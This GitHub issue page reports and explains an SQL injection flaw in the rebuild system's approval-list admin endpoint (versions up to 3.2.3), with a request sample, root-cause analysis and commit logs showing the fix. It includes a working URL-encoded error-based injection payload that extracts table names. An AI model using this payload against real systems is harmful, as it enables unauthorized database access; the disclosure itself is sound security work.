Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

There is a SQL injection vulnerability in the/admin/robot/approval/list interface of the rebuild system #594

Closed
Mechoy opened this issue Mar 17, 2023 · 2 comments

Comments

@Mechoy
Copy link

Mechoy commented Mar 17, 2023

版本 / Version

<=3.2.3

什么问题 / What's the problem

在rebuild系统的/admin/robot/approval/list接口中存在SQL注入漏洞
There is a SQL injection vulnerability in the/admin/robot/approval/list interface of the rebuild system.

如何复现此问题 / How to reproduce this problem

功能点 / Function points

sql1_5

搜索功能的请求报文 / Request message for search function

GET /admin/robot/approval/list?entity=&q=1&_=1678979432278 HTTP/1.1
Host: 192.168.0.102:18080
X-AuthToken: 
Accept: */*
X-CsrfToken: 
X-Requested-With: XMLHttpRequest
X-Client: RB/WEB
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Content-Type: text/plain;charset=utf-8
Referer: http://192.168.0.102:18080/admin/robot/approvals
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: _ga=GA1.1.113967341.1678976466; rb.TourEnd=session; JSESSIONID=78BDF749546E83FB68398994E888984E; _ga_CC8EXS9BLD=GS1.1.1678979231.2.1.1678979433.0.0.0
Connection: close

攻击载荷 / payload

%25%5c%27%20or%20updatexml(1,concat(0x7e,(select+table_name+from+information_schema.tables+where+table_schema=0x72656275696c64+limit+0,1),0x7e),1)--+

漏洞复现 / Vulnerability recurrence

sql1_6

系统环境 (操作系统/MySQL版本/浏览器等) / System environment (OS/MySQL/Browser etc)

Mysql 5.7.26
Windows
JDK1.8.0_341
Chrome

说明 / Suggested description

sql injection vulnerability exists in rebuild <=3.2.3
在rebuild系统小于3.2.3版本中存在SQL注入漏洞
Failed to legally check parameters, resulting in SQL injection vulnerabilities.
未能合法检查参数从而导致sql注入漏洞.

漏洞类型 / Vulnerability Type

SQLi

产品供应商 / Vendor of Product

https://github.com/getrebuild/rebuild

受影响的产品代码库 / Affected Product Code Base

<=3.2.3

受影响组件 / Affected Component

/admin/robot/approval/list

攻击方式 / Attack Type

Remote

漏洞成因 / Cause of vulnerability

Interface:/admin/robot/approval/list
In the com.build.web.robot.approval.ApprovalAdminController#approvalList() method, the SQL statement is created and passed into the queryListOfConfig() method.
在com.rebuild.web.robot.approval.ApprovalAdminController#approvalList方法中,SQL语句被创建,并传入queryListOfConfig()方法。
sql1_1
In the com.rebuild.web.admin.ConfigCommons#queryListOfConfig() method, replace the user's incoming data into the SQL statement, and call the escapeSql() method to process the user's input data.
在com.rebuild.web.admin.ConfigCommons#queryListOfConfig()方法中,将用户传入数据替换至SQL语句中,此时调用escapeSql()方法对用户的输入数据进行处理
sql1_2
In the escapeSql() method, replace one single quotation mark in user input with two single quotation marks.
escapeSql()方法中,将用户输入中的一个单引号替换为两个单引号
sql1_3
Attackers can escape redundant quotes to achieve SQL injection
攻击者可以通过转义的方式将多余的引号处理掉,从而实现SQL注入
Then directly call createQuery() to query
随后直接调用createQuery()进行查询
sql1_4
The end,thanks!

devezhao pushed a commit that referenced this issue Mar 17, 2023
@getrebuild
Copy link
Owner

getrebuild commented Mar 17, 2023

We are fixed, thanks for report!

@Mechoy
Copy link
Author

Mechoy commented Mar 18, 2023

Thank you for your quick response and fixing the issue!

@Mechoy Mechoy closed this as completed Mar 18, 2023
getrebuild added a commit that referenced this issue Mar 18, 2023
* style: 目录样式gh

* style: J_new

* feat: advListFilterTabs

* feat: nav-copyto

* enh: 助记码全拼

* enh: 地图搜索选点

* enh: topnav

* list pn

* .form-line.v33

* open TAG

* KVS addShutdownHook

* fix: #594

---------

Co-authored-by: devezhao <zhaofang123@gmail.com>
getrebuild added a commit that referenced this issue May 5, 2023
* Enh charts (#575)

* NN

* feat: LINE/BAR 2dim and dateContinuous

---------

Co-authored-by: RB <getrebuild@sina.com>

* Copy role (#576)

* feat: showAllUsers

* feat: role copy

* bg-guide

---------

Co-authored-by: RB <getrebuild@sina.com>

* base support (#579)

* Excel pdf (#581)

* Bump lib

* excel to pdf

* PdfConverter


---------

Co-authored-by: devezhao <zhaofang123@gmail.com>

* Files access (#582)


* code style

* se:conf

* feat: folder rights

---------

Co-authored-by: devezhao <zhaofang123@gmail.com>

* Showfields spec (#584)

* field CLASSIFICATION dv

* feat: SYS for DataList

* 视图>详情

* Trigger async (#585)

* 同步发送

* Update @rbv

---------

Co-authored-by: RB <getrebuild@sina.com>

* N2n aggregation (#587)

* 列表视图

* bump

* better delete


* Update @rbv

* star userid

* fieldVarsN2NPath

* USER_OWNS No warn

---------

Co-authored-by: devezhao <zhaofang123@gmail.com>

* Single field after reload (#589)

* v3.3 compact

* singleField reload

* .col-right-compact


---------

Co-authored-by: RB <getrebuild@sina.com>

* List styles (#590)

* quick-filter-pane v3

* dock page

* better

* H5 sync (#593)

* Update submail.html

* better files

* Update @rbv

* H5 sync2 (#595)

* style: 目录样式gh

* style: J_new

* feat: advListFilterTabs

* feat: nav-copyto

* enh: 助记码全拼

* enh: 地图搜索选点

* enh: topnav

* list pn

* .form-line.v33

* open TAG

* KVS addShutdownHook

* fix: #594

---------

Co-authored-by: devezhao <zhaofang123@gmail.com>

* Fix long request (#599)

* fix: `trigger/exec-manual` async

* fix: lang

* fix: #596

* open: detailsNotEmpty (#600)

* open: detailsNotEmpty

* enh: template preview

* protable tipping

* be: form-design

* be: file upload noname

* style: better

* be: NTEXT \n

---------

Co-authored-by: RB <getrebuild@sina.com>

* List topnav (#601)

* setHidden

* enh: THROTTLED_QUEUE

* enh: PageTokenVerify 2h

* fix: Mix N2N & styles

* feat: 表单回填源字段支持二级

* be: showStartGuide

* fix: spec label

* fix: 图表刻度

* fix: file copy

---------

Co-authored-by: devezhao <zhaofang123@gmail.com>

* Trigger fa n2n (#602)

* style

* Update entities-sheet.html

* be: N2N in FieldWriteback

* feat: fa 目标字段支持 N2N NTEXT

* Update trigger.FIELDAGGREGATION.js

* be

* Update LogFunction.java

* be: save tips

* transform-design

* be: meta-name trim

* enh: show import speed

* Project view (#603)

* relaxed-path-chars

* be: style

* feat: LiteForm, setNullable, setTip

* be: forms include

* Update @rbv

* style: 断行

* enh: customized

* style: dialog footer

---------

Co-authored-by: devezhao <zhaofang123@gmail.com>

* Excel use refs (#605)

* template v33

* be: schema timeout

* DataList renderAfter

* enh: whenUpdateFields

* be: RbAlter hide force

* Update @rbv

* fix: useValueOfVarRecord

---------

Co-authored-by: devezhao <zhaofang123@gmail.com>

* import for users (#608)

* fix: template v33

* feat: clearFields

* be: login btn

* enh: 直接打印

* fix: textCommon overflow

* be: J_decimalTypeFlag

* be: styles & ID

* AssertFailedException

* be: aviator func

* FieldWritebackRefresh

* SSS

* be: RecordBuilder

* classification-editor

* Update ClassificationFileImporter.java

* be: target record DELETED

* Update BarCodeSupport.java

* feat: N selected

* imports for users

* be: barcode w/h

* Update DataImportController.java

* be: TopNav

* open: textCommon

* feat: EnableBizzPart

* text $separator

---------

Co-authored-by: devezhao <zhaofang123@gmail.com>

* Better v3.3 (#610)

* be: style

* 3.3.0-beta1

* be

---------

Co-authored-by: devezhao <zhaofang123@gmail.com>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

2 participants